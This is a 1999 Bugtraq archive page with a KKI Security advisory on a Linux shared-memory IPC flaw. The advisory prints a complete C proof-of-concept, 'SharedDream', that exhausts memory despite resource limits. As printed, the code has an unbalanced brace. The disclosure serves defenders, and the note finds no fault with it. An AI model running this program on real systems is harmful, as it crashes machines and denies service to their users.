Bugtraq mailing list archives
KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability
From: shadow () KKI PL (Robert 'Shadow' Paj±k)
Date: Tue, 14 Sep 1999 16:20:21 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ KKI Security Team Cracow Commercial Internet http://www.security.kki.pl http://www.kki.pl mailto:security () security kki pl mailto:biuro () kki pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Raport title : Shared Memory DoS - IPC vulnerability (Linux abuse as example) Problem found by : Robert Pajak (shadow () security kki pl), probably other ppl found that first - one of them is lcamtuf, Solar Designer is probably other... Raport created by : Robert Pajak (shadow () security kki pl) Lukasz Luzar (lluzar () security kki pl) Raport published : 14 September, 1999 Raport code : KKIS.14091999.004.b Vulnerable programs : system vulnerability... Systems affected : Linux, other (?) ... Archive : http://www.security.kki.pl/advisories/ Risk level : high ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Useing attached program one can DoS machine even when limits are set up... This is due to fact that shared memory segments can exist without beeing bind with processes. To protect you should diable this operations, or use Solar Designer's stack patch with limits set, etc... Alan Cox has been notified... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Local Denial of Services attack - simple bypassing limits... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ /* SharedDream - (c) Shadow, KKI Security */ /* */ /* I'm not responsible for any damaged done by this proggie... */ /* It should be used only for education... */ /* To protect - use brain, Solar's patches, or whatever... */ /* This problem is because shared memory segments can exist even */ /* if they are not combined with programs! */ /* !This program will crash your machine (localy) at kernels 2.x! */ /* If you are on kernels 2.2.x with limits run it twice :) */ /* really - even when rescource limits are set! :) */ /* Probably original idea by lcamtuf */ /* heck you should told me that you found it */ /* first ;) */ /* heh - worm greetings for for Coding Style ;) */ #include <stdio.h> #include <sys/types.h> #include <sys/ipc.h> #include <sys/shm.h> #define BOLD "\033[00;04m" #define BLUE "\033[00;36m" #define STAN "\033[00;00m" void main(void) { char *p; int i = 10000000; printf("\n\n"); printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments abuser\n"); printf(BOLD "*)\n" STAN); printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD "shadow () security kki pl" STAN ")\n"); printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me), lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i forgot to mention\n" STAN); printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to be limited\n"); printf(BOLD "*)" STAN " Starting..."); fflush(stdout); while (1) if (p = shmat(shmget(0, i, 0777), 0, 0)) memset( p,'\0',i); // need to touch memory somehow printf(".DoW."); fflush(stdout); } else { i--; } } exit(0); } ~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security () security kki pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~
Current thread:
- KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability Robert 'Shadow' Paj±k (Sep 14)
- SCO 5.0.5 lpr local root exploit Brock Tellier (Sep 14)
- Re: KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability Henrik Nordstrom (Sep 14)
- proftpd-1.2.0.pre6 Albert C. Uy (Sep 14)
- Re: proftpd-1.2.0.pre6 Tymm Twillman (Sep 15)